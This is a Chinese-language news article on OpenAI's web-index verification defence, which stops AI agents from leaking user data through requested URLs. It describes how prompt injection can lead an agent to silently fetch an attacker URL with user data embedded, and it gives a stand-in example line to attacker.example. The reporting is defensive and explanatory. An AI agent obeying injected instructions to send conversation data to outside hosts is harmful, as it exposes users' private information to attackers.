OpenAI 部署網頁索引防禦機制對抗 AI 代理資料竊取
Alvin Lang 2026年3月3日 20:15
OpenAI 揭露新的安全架構,使用獨立網頁索引來防止基於 URL 的資料外洩,保護 ChatGPT 和代理式 AI 系統。
OpenAI 詳細說明了其技術方法,以防止 AI 代理透過 URL 悄悄洩漏使用者資料——隨著自主式 AI 系統獲得網頁瀏覽能力,這類漏洞變得越來越重要。該公司的解決方案依賴於將請求的 URL 與獨立網頁索引進行交叉比對,該索引完全無法存取使用者對話。
這種威脅直接但隱蔽。當 AI 代理載入 URL 時,該請求會被目標伺服器記錄。攻擊者使用提示注入可以操控代理去獲取類似 https://attacker.example/collect?data=your_email@domain.com 的內容——而使用者可能永遠不會注意到,因為它是靜默發生的,可能是以嵌入式圖片載入的方式。
為何允許清單失敗了
OpenAI 明確拒絕了將信任網域加入白名單這一明顯的修復方法。有兩個問題:合法網站支援重新導向,可能會將流量導向惡意目的地,而且僵化的清單會造成阻礙,訓練使用者無意識地點擊通過警告。
相反,該公司建立了相當於來源檢查的機制。他們的獨立網頁爬蟲以與搜尋引擎相同的方式發現公開 URL——透過掃描開放網路而不與使用者資料建立任何連接。當代理嘗試獲取 URL 時,系統會檢查該確切位址是否已存在於公開索引中。
如果符合,則自動載入繼續進行。如果不符合,使用者會看到警告:「此連結未經驗證。它可能包含來自您對話的資訊。」
更廣泛安全推動的一部分
此次揭露是繼 OpenAI 在2月份推出「鎖定模式」以停用高風險代理功能,以及針對外部連結的「高風險」標籤系統之後。該公司剛從3月初涉及 Amazon、Nvidia 和 SoftBank 的融資輪中獲得8,400億美元估值,自2025年底安全研究人員展示成功的資料外洩攻擊以來,一直積極修補漏洞。
OpenAI 清楚承認其局限性:這些保護措施無法保證頁面內容是可信的,無法阻止社交工程,也無法防止所有提示注入。該公司將此定位為「更廣泛的深度防禦策略中的一層」,並將代理安全視為一個持續的工程問題,而不是已解決的問題。
對於基於 OpenAI API 進行開發的開發者或部署代理式系統的企業而言,隨此公告發布的技術論文提供了值得審查的實作細節。核心見解——公開 URL 驗證可以作為資料安全的代理——可能在 OpenAI 生態系統之外也適用,因為業界正在努力保護日益自主的 AI 代理。
圖片來源: Shutterstock- openai
- ai security
- prompt injection
- chatgpt
- data privacy
